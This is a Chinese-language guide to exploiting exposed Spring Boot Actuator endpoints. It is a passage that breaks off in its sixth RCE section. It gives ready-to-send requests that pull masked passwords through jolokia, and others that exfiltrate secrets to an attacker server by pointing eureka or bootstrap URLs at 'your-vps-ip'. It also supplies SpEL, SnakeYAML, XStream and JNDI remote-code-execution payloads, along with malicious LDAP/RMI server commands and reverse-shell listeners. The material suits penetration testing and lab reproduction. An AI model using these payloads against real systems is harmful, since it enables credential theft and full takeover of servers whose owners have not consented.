[步骤二: 设置 spring.cloud.bootstrap.location 属性](#步骤二-设置-springcloudbootstraplocation-属性) * [步骤三: 刷新配置](#步骤三-刷新配置) * [漏洞原理:](#漏洞原理-1) * [漏洞分析:](#漏洞分析-1) * [漏洞环境:](#漏洞环境-1) * [0x03:eureka xstream deserialization RCE](#0x03eureka-xstream-deserialization-rce) * [利用条件:](#利用条件-6) * [利用方法:](#利用方法-6) * [步骤一:架设响应恶意 XStream payload 的网站](#步骤一架设响应恶意-xstream-payload-的网站) * [步骤二:监听反弹 shell 的端口](#步骤二监听反弹-shell-的端口) * [步骤三:设置 eureka.client.serviceUrl.defaultZone 属性](#步骤三设置-eurekaclientserviceurldefaultzone-属性) * [步骤四:刷新配置](#步骤四刷新配置) * [漏洞原理:](#漏洞原理-2) * [漏洞分析:](#漏洞分析-2) * [漏洞环境:](#漏洞环境-2) * [0x04:jolokia logback JNDI RCE](#0x04jolokia-logback-jndi-rce) * [利用条件:](#利用条件-7) * [利用方法:](#利用方法-7) * [步骤一:查看已存在的 MBeans](#步骤一查看已存在的-mbeans) * [步骤二:托管 xml 文件](#步骤二托管-xml-文件) * [步骤三:准备要执行的 Java 代码](#步骤三准备要执行的-java-代码) * [步骤四:架设恶意 ldap 服务](#步骤四架设恶意-ldap-服务) * [步骤五:监听反弹 shell 的端口](#步骤五监听反弹-shell-的端口) * [步骤六:从外部 URL 地址加载日志配置文件](#步骤六从外部-url-地址加载日志配置文件) * [漏洞原理:](#漏洞原理-3) * [漏洞分析:](#漏洞分析-3) * [漏洞环境:](#漏洞环境-3) * [0x05:jolokia Realm JNDI RCE](#0x05jolokia-realm-jndi-rce) * [利用条件:](#利用条件-8) * [利用方法:](#利用方法-8) * [步骤一:查看已存在的 MBeans](#步骤一查看已存在的-mbeans-1) * [步骤二:准备要执行的 Java 代码](#步骤二准备要执行的-java-代码) * [步骤三:托管 class 文件](#步骤三托管-class-文件) * [步骤四:架设恶意 rmi 服务](#步骤四架设恶意-rmi-服务) * [步骤五:监听反弹 shell 的端口](#步骤五监听反弹-shell-的端口-1) * [步骤六:发送恶意 payload](#步骤六发送恶意-payload) * [漏洞原理:](#漏洞原理-4) * [漏洞分析:](#漏洞分析-4) * [漏洞环境:](#漏洞环境-4) * [0x06:restart h2 database query RCE](#0x06restart-h2-database-query-rce) * [利用条件:](#利用条件-9) * [利用方法:](#利用方法-9) * [步骤一:设置 spring.datasource.hikari.connection-test-query 属性](#步骤一设置-springdatasourcehikariconnection-test-query-属性) * [步骤二:重启应用](#步骤二重启应用) * [漏洞原理:](#漏洞原理-5) * [漏洞分析:](#漏洞分析-5) * [漏洞环境:](#漏洞环境-5) * [0x07:h2 database console JNDI RCE](#0x07h2-database-console-jndi-rce) * [利用条件:](#利用条件-10) * [利用方法:](#利用方法-10) * [步骤一:访问路由获得 jsessionid](#步骤一访问路由获得-jsessionid) * [步骤二:准备要执行的 Java 代码](#步骤二准备要执行的-java-代码-1) * [步骤三:托管 class 文件](#步骤三托管-class-文件-1) * [步骤四:架设恶意 ldap 服务](#步骤四架设恶意-ldap-服务-1) * [步骤五:监听反弹 shell 的端口](#步骤五监听反弹-shell-的端口-2) * [步骤六:发包触发 JNDI 注入](#步骤六发包触发-jndi-注入) * [漏洞分析:](#漏洞分析-6) * [漏洞环境:](#漏洞环境-6) * [0x08:mysql jdbc deserialization RCE](#0x08mysql-jdbc-deserialization-rce) * [利用条件:](#利用条件-11) * [利用方法:](#利用方法-11) * [步骤一:查看环境依赖](#步骤一查看环境依赖) * [步骤二:架设恶意 rogue mysql server](#步骤二架设恶意-rogue-mysql-server) * [步骤三:设置 spring.datasource.url 属性](#步骤三设置-springdatasourceurl-属性) * [步骤四:刷新配置](#步骤四刷新配置-1) * [步骤五:触发数据库查询](#步骤五触发数据库查询) * [步骤六:恢复正常 jdbc url](#步骤六恢复正常-jdbc-url) * [漏洞原理:](#漏洞原理-6) * [漏洞分析:](#漏洞分析-7) * [漏洞环境:](#漏洞环境-7) * [0x09:restart logging.config logback JNDI RCE](#0x09restart-loggingconfig-logback-jndi-rce) * [利用条件:](#利用条件-12) * [利用方法:](#利用方法-12) * [步骤一:托管 xml 文件](#步骤一托管-xml-文件) * [步骤二:托管恶意 ldap 服务及代码](#步骤二托管恶意-ldap-服务及代码) * [步骤三:设置 logging.config 属性](#步骤三设置-loggingconfig-属性) * [步骤四:重启应用](#步骤四重启应用) * [漏洞原理:](#漏洞原理-7) * [漏洞分析:](#漏洞分析-8) * [漏洞环境:](#漏洞环境-8) * [0x0A:restart logging.config groovy RCE](#0x0arestart-loggingconfig-groovy-rce) * [利用条件:](#利用条件-13) * [利用方法:](#利用方法-13) * [步骤一:托管 groovy 文件](#步骤一托管-groovy-文件) * [步骤二:设置 logging.config 属性](#步骤二设置-loggingconfig-属性) * [步骤三:重启应用](#步骤三重启应用) * [漏洞原理:](#漏洞原理-8) * [漏洞环境:](#漏洞环境-9) * [0x0B:restart spring.main.sources groovy RCE](#0x0brestart-springmainsources-groovy-rce) * [利用条件:](#利用条件-14) * [利用方法:](#利用方法-14) * [步骤一:托管 groovy 文件](#步骤一托管-groovy-文件-1) * [步骤二:设置 spring.main.sources 属性](#步骤二设置-springmainsources-属性) * [步骤三:重启应用](#步骤三重启应用-1) * [漏洞原理:](#漏洞原理-9) * [漏洞环境:](#漏洞环境-10) * [0x0C:restart spring.datasource.data h2 database RCE](#0x0crestart-springdatasourcedata-h2-database-rce) * [利用条件:](#利用条件-15) * [利用方法:](#利用方法-15) * [步骤一:托管 sql 文件](#步骤一托管-sql-文件) * [步骤二:设置 spring.datasource.data 属性](#步骤二设置-springdatasourcedata-属性) * [步骤三:重启应用](#步骤三重启应用-2) * [漏洞原理:](#漏洞原理-10) * [漏洞环境:](#漏洞环境-11) ## 零:路由和版本 ### 0x01:路由知识 - 有些程序员会自定义 `/manage`、`/management` 、**项目 App 相关名称**为 spring 根路径 - Spring Boot Actuator 1.x 版本默认内置路由的起始路径为 `/` ,2.x 版本则统一以 `/actuator` 为起始路径 - Spring Boot Actuator 默认的内置路由名字,如 `/env` 有时候也会被程序员修改,比如修改成 `/appenv` ### 0x02:版本知识 > Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配置管理、服务注册与发现、智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合。 #### 组件版本的相互依赖关系: | 依赖项 | 版本列表及依赖组件版本 | | -------------------------- | ------------------------------------------------------------ | | spring-boot-starter-parent | [spring-boot-starter-parent](https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-parent) | | spring-boot-dependencies | [spring-boot-dependencies](https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-dependencies) | | spring-cloud-dependencies | [spring-cloud-dependencies](https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-dependencies) | #### Spring Cloud 与 Spring Boot 版本之间的依赖关系: | Spring Cloud 大版本 | Spring Boot 版本 | | ------------------- | ------------------------------------ | | Angel | 兼容 Spring Boot 1.2.x | | Brixton | 兼容 Spring Boot 1.3.x、1.4.x | | Camden | 兼容 Spring Boot 1.4.x、1.5.x | | Dalston | 兼容 Spring Boot 1.5.x,不兼容 2.0.x | | Edgware | 兼容 Spring Boot 1.5.x,不兼容 2.0.x | | Finchley | 兼容 Spring Boot 2.0.x,不兼容 1.5.x | | Greenwich | 兼容 Spring Boot 2.1.x | | Hoxton | 兼容 Spring Boot 2.2.x | #### Spring Cloud 小版本号的后缀及含义: | 小版本号后缀 | 含义 | | -------------- | --------------------------------------- | | BUILD-SNAPSHOT | 快照版,代码不是固定,处于变化之中 | | MX | 里程碑版 | | RCX | 候选发布版 | | RELEASE | 正式发布版 | | SRX | (修复错误和 bug 并再次发布的)正式发布版 | ## 一:信息泄露 ### 0x01:路由地址及接口调用详情泄漏 > 开发人员没有意识到地址泄漏会导致安全隐患或者开发环境切换为线上生产环境时,相关人员没有更改配置文件,忘记切换环境配置等 > 直接访问以下两个 swagger 相关路由,验证漏洞是否存在: ``` /v2/api-docs /swagger-ui.html ``` 其他一些可能会遇到的 swagger、swagger codegen、swagger-dubbo 等相关接口路由: ``` /swagger /api-docs /api.html /swagger-ui /swagger/codes /api/index.html /api/v2/api-docs /v2/swagger.json /swagger-ui/html /distv2/index.html /swagger/index.html /sw/swagger-ui.html /api/swagger-ui.html /static/swagger.json /user/swagger-ui.html /swagger-ui/index.html /swagger-dubbo/api-docs /template/swagger-ui.html /swagger/static/index.html /dubbo-provider/distv2/index.html /spring-security-rest/api/swagger-ui.html /spring-security-oauth-resource/swagger-ui.html ``` 除此之外,下面的 spring boot actuator 相关路由有时也会包含(或推测出)一些接口地址信息,但是无法获得参数相关信息: ``` /mappings /metrics /beans /configprops /actuator/metrics /actuator/mappings /actuator/beans /actuator/configprops ``` **一般来讲,暴露出 spring boot 应用的相关接口和传参信息并不能算是漏洞**,但是以 "**默认安全**" 来讲,不暴露出这些信息更加安全。 对于攻击者来讲,一般会仔细审计暴露出的接口以增加对业务系统的了解,并会同时检查应用系统是否存在未授权访问、越权等其他业务类型漏洞。 ### 0x02:配置不当而暴露的路由 > 主要是因为程序员开发时没有意识到暴露路由可能会造成安全风险,或者没有按照标准流程开发,忘记上线时需要修改/切换生产环境的配置 参考 [production-ready-endpoints](https://docs.spring.io/spring-boot/docs/1.5.10.RELEASE/reference/htmlsingle/#production-ready-endpoints) 和 [spring-boot.txt](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt),可能因为配置不当而暴露的默认内置路由可能会有: ``` /actuator /auditevents /autoconfig /beans /caches /conditions /configprops /docs /dump /env /flyway /health /heapdump /httptrace /info /intergrationgraph /jolokia /logfile /loggers /liquibase /metrics /mappings /prometheus /refresh /scheduledtasks /sessions /shutdown /trace /threaddump /actuator/auditevents /actuator/beans /actuator/health /actuator/conditions /actuator/configprops /actuator/env /actuator/info /actuator/loggers /actuator/heapdump /actuator/threaddump /actuator/metrics /actuator/scheduledtasks /actuator/httptrace /actuator/mappings /actuator/jolokia /actuator/hystrix.stream ``` 其中对寻找漏洞比较重要接口的有: - `/env`、`/actuator/env` GET 请求 `/env` 会直接泄露环境变量、内网地址、配置中的用户名等信息;当程序员的属性名命名不规范,例如 password 写成 psasword、pwd 时,会泄露密码明文; 同时有一定概率可以通过 POST 请求 `/env` 接口设置一些属性,间接触发相关 RCE 漏洞;同时有概率获得星号遮掩的密码、密钥等重要隐私信息的明文。 - `/refresh`、`/actuator/refresh` POST 请求 `/env` 接口设置属性后,可同时配合 POST 请求 `/refresh` 接口刷新属性变量来触发相关 RCE 漏洞。 - `/restart`、`/actuator/restart` 暴露出此接口的情况较少;可以配合 POST请求 `/env` 接口设置属性后,再 POST 请求 `/restart` 接口重启应用来触发相关 RCE 漏洞。 - `/jolokia`、`/actuator/jolokia` 可以通过 `/jolokia/list` 接口寻找可以利用的 MBean,间接触发相关 RCE 漏洞、获得星号遮掩的重要隐私信息的明文等。 - `/trace`、`/actuator/httptrace` 一些 http 请求包访问跟踪信息,有可能在其中发现内网应用系统的一些请求信息详情;以及有效用户或管理员的 cookie、jwt token 等信息。 ### 0x03:获取被星号脱敏的密码的明文 (方法一) > 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果 #### 利用条件: - 目标网站存在 `/jolokia` 或 `/actuator/jolokia` 接口 - 目标使用了 `jolokia-core` 依赖(版本要求暂未知) #### 利用方法: ##### 步骤一: 找到想要获取的属性名 GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 ##### 步骤二: jolokia 调用相关 Mbean 获取明文 将下面示例中的 `security.user.password` 替换为实际要获取的属性名,直接发包;明文值结果包含在 response 数据包中的 `value` 键中。 - 调用 `org.springframework.boot` Mbean > 实际上是调用 org.springframework.boot.admin.SpringApplicationAdminMXBeanRegistrar 类实例的 getProperty 方法 spring 1.x ``` POST /jolokia Content-Type: application/json {"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} ``` spring 2.x ``` POST /actuator/jolokia Content-Type: application/json {"mbean": "org.springframework.boot:name=SpringApplication,type=Admin","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} ``` - 调用 `org.springframework.cloud.context.environment` Mbean > 实际上是调用 org.springframework.cloud.context.environment.EnvironmentManager 类实例的 getProperty 方法 spring 1.x ``` POST /jolokia Content-Type: application/json {"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} ``` spring 2.x ``` POST /actuator/jolokia Content-Type: application/json {"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager","operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]} ``` - 调用其他 Mbean > 目标具体情况和存在的 Mbean 可能不一样,可以搜索 getProperty 等关键词,寻找可以调用的方法。 ### 0x04:获取被星号脱敏的密码的明文 (方法二) #### 利用条件: - 可以 GET 请求目标网站的 `/env` - 可以 POST 请求目标网站的 `/env` - 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖) - 目标使用了 `spring-cloud-starter-netflix-eureka-client` 依赖 - 目标可以请求攻击者的服务器(请求可出外网) #### 利用方法: ##### 步骤一: 找到想要获取的属性名 GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 ##### 步骤二: 使用 nc 监听 HTTP 请求 在自己控制的外网服务器上监听 80 端口: ```bash nc -lvk 80 ``` ##### 步骤三: 设置 eureka.client.serviceUrl.defaultZone 属性 将下面 `http://value:${security.user.password}@your-vps-ip` 中的 `security.user.password` 换成自己想要获取的对应的星号 * 遮掩的属性名; `your-vps-ip` 换成自己外网服务器的真实 ip 地址。 spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded eureka.client.serviceUrl.defaultZone=http://value:${security.user.password}@your-vps-ip ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:${security.user.password}@your-vps-ip"} ``` ##### 步骤四: 刷新配置 spring 1.x ``` POST /refresh Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/refresh Content-Type: application/json ``` ##### 步骤五: 解码属性值 正常的话,此时 nc 监听的服务器会收到目标发来的请求,其中包含类似如下 `Authorization` 头内容: ``` Authorization: Basic dmFsdWU6MTIzNDU2 ``` 将其中的 `dmFsdWU6MTIzNDU2`部分使用 base64 解码,即可获得类似明文值 `value:123456`,其中的 `123456` 即是目标星号 * 脱敏前的属性值明文。 ### 0x05:获取被星号脱敏的密码的明文 (方法三) #### 利用条件: - 通过 POST `/env` 设置属性触发目标对外网指定地址发起任意 http 请求 - 目标可以请求攻击者的服务器(请求可出外网) #### 利用方法: > 参考 UUUUnotfound 提出的 [issue-1](https://github.com/LandGrey/SpringBootVulExploit/issues/1),可以在目标发外部 http 请求的过程中,在 url path 中利用占位符带出数据 ##### 步骤一: 找到想要获取的属性名 GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 ##### 步骤二: 使用 nc 监听 HTTP 请求 在自己控制的外网服务器上监听 80 端口: ```bash nc -lvk 80 ``` ##### 步骤三: 触发对外 http 请求 - `spring.cloud.bootstrap.location` 方法(**同时适用于**明文数据中有特殊 url 字符的情况) spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded spring.cloud.bootstrap.location=http://your-vps-ip/?=${security.user.password} ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/?=${security.user.password}"} ``` - `eureka.client.serviceUrl.defaultZone` 方法(**不适用于**明文数据中有特殊 url 字符的情况) spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password} ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/${security.user.password}"} ``` ##### 步骤四: 刷新配置 spring 1.x ``` POST /refresh Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/refresh Content-Type: application/json ``` ### 0x06:获取被星号脱敏的密码的明文 (方法四) > 访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果 #### 利用条件: - 可正常 GET 请求目标 `/heapdump` 或 `/actuator/heapdump` 接口 #### 利用方法: ##### 步骤一: 找到想要获取的属性名 GET 请求目标网站的 `/env` 或 `/actuator/env` 接口,搜索 `******` 关键词,找到想要获取的被星号 * 遮掩的属性值对应的属性名。 ##### 步骤二: 下载 jvm heap 信息 > 下载的 heapdump 文件大小通常在 50M—500M 之间,有时候也可能会大于 2G `GET` 请求目标的 `/heapdump` 或 `/actuator/heapdump` 接口,下载应用实时的 JVM 堆信息 ##### 步骤三: 使用 MAT 获得 jvm heap 中的密码明文 参考 [文章](https://landgrey.me/blog/16/) 方法,使用 [Eclipse Memory Analyzer](https://www.eclipse.org/mat/downloads.php) 工具的 **OQL** 语句 ``` select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password")) 或 select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password")) ``` 辅助用 "**password**" 等关键词快速过滤分析,获得密码等相关敏感信息的明文。 ## 二:远程代码执行 > 由于 spring boot 相关漏洞可能是多个组件漏洞组合导致的,所以有些漏洞名字起的不太正规,以能区分为准 ### 0x01:whitelabel error page SpEL RCE #### 利用条件: - spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0 - 至少知道一个触发 springboot 默认错误页面的接口及参数名 #### 利用方法: ##### 步骤一:找到一个正常传参处 比如发现访问 `/article?id=xxx` ,页面会报状态码为 500 的错误: `Whitelabel Error Page`,则后续 payload 都将会在参数 id 处尝试。 ##### 步骤二:执行 SpEL 表达式 输入 `/article?id=${7*7}` ,如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上,那么基本可以确定目标存在 SpEL 表达式注入漏洞。 由字符串格式转换成 `0x**` java 字节形式,方便执行任意代码: ```python # coding: utf-8 result = "" target = 'open -a Calculator' for x in target: result += hex(ord(x)) + "," print(result.rstrip(',')) ``` 执行 `open -a Calculator` 命令 ```java ${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))} ``` #### 漏洞原理: 1. spring boot 处理参数值出错,流程进入 `org.springframework.util.PropertyPlaceholderHelper` 类中 2. 此时 URL 中的参数值会用 `parseStringValue` 方法进行递归解析 3. 其中 `${}` 包围的内容都会被 `org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration` 类的 `resolvePlaceholder` 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞 #### 漏洞分析: ​ [SpringBoot SpEL表达式注入漏洞-分析与复现](https://www.cnblogs.com/litlife/p/10183137.html) #### 漏洞环境: [repository/springboot-spel-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce) 正常访问: ``` http://127.0.0.1:9091/article?id=66 ``` 执行 `open -a Calculator` 命令: ```java http://127.0.0.1:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))} ``` ### 0x02:spring cloud SnakeYAML RCE #### 利用条件: - 可以 POST 请求目标网站的 `/env` 接口设置属性 - 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖) - 目标依赖的 `spring-cloud-starter` 版本 < 1.3.0.RELEASE - 目标可以请求攻击者的 HTTP 服务器(请求可出外网) #### 利用方法: ##### 步骤一: 托管 yml 和 jar 文件 在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) ```bash # 使用 python 快速开启 http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` 在网站根目录下放置后缀为 `yml` 的文件 `example.yml`,内容如下: ```yaml !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://your-vps-ip/example.jar"] ]] ] ``` 在网站根目录下放置后缀为 `jar` 的文件 `example.jar`,内容是要执行的代码,代码编写及编译方式参考 [yaml-payload](https://github.com/artsploit/yaml-payload)。 ##### 步骤二: 设置 spring.cloud.bootstrap.location 属性 spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded spring.cloud.bootstrap.location=http://your-vps-ip/example.yml ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"spring.cloud.bootstrap.location","value":"http://your-vps-ip/example.yml"} ``` ##### 步骤三: 刷新配置 spring 1.x ``` POST /refresh Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/refresh Content-Type: application/json ``` #### 漏洞原理: 1. spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址 2. refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容 3. SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作 4. 先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件 5. 然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化 6. 实例化类时执行恶意代码,造成 RCE 漏洞 #### 漏洞分析: ​ [Exploit Spring Boot Actuator 之 Spring Cloud Env 学习笔记](https://b1ngz.github.io/exploit-spring-boot-actuator-spring-cloud-env-note/) #### 漏洞环境: [repository/springcloud-snakeyaml-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springcloud-snakeyaml-rce) 正常访问: ``` http://127.0.0.1:9092/env ``` ### 0x03:eureka xstream deserialization RCE #### 利用条件: - 可以 POST 请求目标网站的 `/env` 接口设置属性 - 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖) - 目标使用的 `eureka-client` < 1.8.7(通常包含在 `spring-cloud-starter-netflix-eureka-client` 依赖中) - 目标可以请求攻击者的 HTTP 服务器(请求可出外网) #### 利用方法: ##### 步骤一:架设响应恶意 XStream payload 的网站 提供一个依赖 Flask 并符合要求的 [python 脚本示例](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-xstream-rce.py),作用是利用目标 Linux 机器上自带的 python 来反弹shell。 使用 python 在自己控制的服务器上运行以上的脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号。 ##### 步骤二:监听反弹 shell 的端口 一般使用 nc 监听端口,等待反弹 shell ```bash nc -lvp 443 ``` ##### 步骤三:设置 eureka.client.serviceUrl.defaultZone 属性 spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded eureka.client.serviceUrl.defaultZone=http://your-vps-ip/example ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"eureka.client.serviceUrl.defaultZone","value":"http://your-vps-ip/example"} ``` ##### 步骤四:刷新配置 spring 1.x ``` POST /refresh Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/refresh Content-Type: application/json ``` #### 漏洞原理: 1. eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址 2. refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload 3. 目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞 #### 漏洞分析: ​ [Spring Boot Actuator从未授权访问到getshell](https://www.freebuf.com/column/234719.html) #### 漏洞环境: [repository/springboot-eureka-xstream-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-eureka-xstream-rce) 正常访问: ``` http://127.0.0.1:9093/env ``` ### 0x04:jolokia logback JNDI RCE #### 利用条件: - 目标网站存在 `/jolokia` 或 `/actuator/jolokia` 接口 - 目标使用了 `jolokia-core` 依赖(版本要求暂未知)并且环境中存在相关 MBean - 目标可以请求攻击者的 HTTP 服务器(请求可出外网) - 普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过 #### 利用方法: ##### 步骤一:查看已存在的 MBeans 访问 `/jolokia/list` 接口,查看是否存在 `ch.qos.logback.classic.jmx.JMXConfigurator` 和 `reloadByURL` 关键词。 ##### 步骤二:托管 xml 文件 在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) ```bash # 使用 python 快速开启 http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` 在根目录放置以 `xml` 结尾的 `example.xml` 文件,内容如下: ```xml <configuration> <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/JNDIObject" as="appName" /> </configuration> ``` ##### 步骤三:准备要执行的 Java 代码 编写优化过后的用来反弹 shell 的 [Java 示例代码](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`, 使用兼容低版本 jdk 的方式编译: ```bash javac -source 1.5 -target 1.5 JNDIObject.java ``` 然后将生成的 `JNDIObject.class` 文件拷贝到 **步骤二** 中的网站根目录。 ##### 步骤四:架设恶意 ldap 服务 下载 [marshalsec](https://github.com/mbechler/marshalsec) ,使用下面命令架设对应的 ldap 服务: ```bash java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389 ``` ##### 步骤五:监听反弹 shell 的端口 一般使用 nc 监听端口,等待反弹 shell ```bash nc -lv 443 ``` ##### 步骤六:从外部 URL 地址加载日志配置文件 > ⚠️ 如果目标成功请求了example.xml 并且 marshalsec 也接收到了目标请求,但是目标没有请求 JNDIObject.class,大概率是因为目标环境的 jdk 版本太高,导致 JNDI 利用失败。 替换实际的 your-vps-ip 地址访问 URL 触发漏洞: ``` /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/example.xml ``` #### 漏洞原理: 1. 直接访问可触发漏洞的 URL,相当于通过 jolokia 调用 `ch.qos.logback.classic.jmx.JMXConfigurator` 类的 `reloadByURL` 方法 2. 目标机器请求外部日志配置文件 URL 地址,获得恶意 xml 文件内容 3. 目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞) 4. xml 文件中利用 `logback` 依赖的 `insertFormJNDI` 标签,设置了外部 JNDI 服务器地址 5. 目标机器请求恶意 JNDI 服务器,导致 JNDI 注入,造成 RCE 漏洞 #### 漏洞分析: ​ [spring boot actuator rce via jolokia](https://xz.aliyun.com/t/4258) #### 漏洞环境: [repository/springboot-jolokia-logback-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce) 正常访问: ``` http://127.0.0.1:9094/env ``` ### 0x05:jolokia Realm JNDI RCE #### 利用条件: - 目标网站存在 `/jolokia` 或 `/actuator/jolokia` 接口 - 目标使用了 `jolokia-core` 依赖(版本要求暂未知)并且环境中存在相关 MBean - 目标可以请求攻击者的服务器(请求可出外网) - 普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u141/7u131/8u121(RMI),但相关环境可绕过 #### 利用方法: ##### 步骤一:查看已存在的 MBeans 访问 `/jolokia/list` 接口,查看是否存在 `type=MBeanFactory` 和 `createJNDIRealm` 关键词。 ##### 步骤二:准备要执行的 Java 代码 编写优化过后的用来反弹 shell 的 [Java 示例代码](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`。 ##### 步骤三:托管 class 文件 在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) ```bash # 使用 python 快速开启 http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` 将**步骤二**中编译好的 class 文件拷贝到 HTTP 服务器根目录。 ##### 步骤四:架设恶意 rmi 服务 下载 [marshalsec](https://github.com/mbechler/marshalsec) ,使用下面命令架设对应的 rmi 服务: ```bash java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://your-vps-ip:80/#JNDIObject 1389 ``` ##### 步骤五:监听反弹 shell 的端口 一般使用 nc 监听端口,等待反弹 shell ```bash nc -lvp 443 ``` ##### 步骤六:发送恶意 payload 根据实际情况修改 [springboot-realm-jndi-rce.py](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py) 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。 #### 漏洞原理: 1. 利用 jolokia 调用 createJNDIRealm 创建 JNDIRealm 2. 设置 connectionURL 地址为 RMI Service URL 3. 设置 contextFactory 为 RegistryContextFactory 4. 停止 Realm 5. 启动 Realm 以触发指定 RMI 地址的 JNDI 注入,造成 RCE 漏洞 #### 漏洞分析: ​ [Yet Another Way to Exploit Spring Boot Actuators via Jolokia](https://static.anquanke.com/download/b/security-geek-2019-q1/article-10.html) #### 漏洞环境: [repository/springboot-jolokia-logback-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-jolokia-logback-rce) 正常访问: ``` http://127.0.0.1:9094/env ``` ### 0x06:restart h2 database query RCE #### 利用条件: - 可以 POST 请求目标网站的 `/env` 接口设置属性 - 可以 POST 请求目标网站的 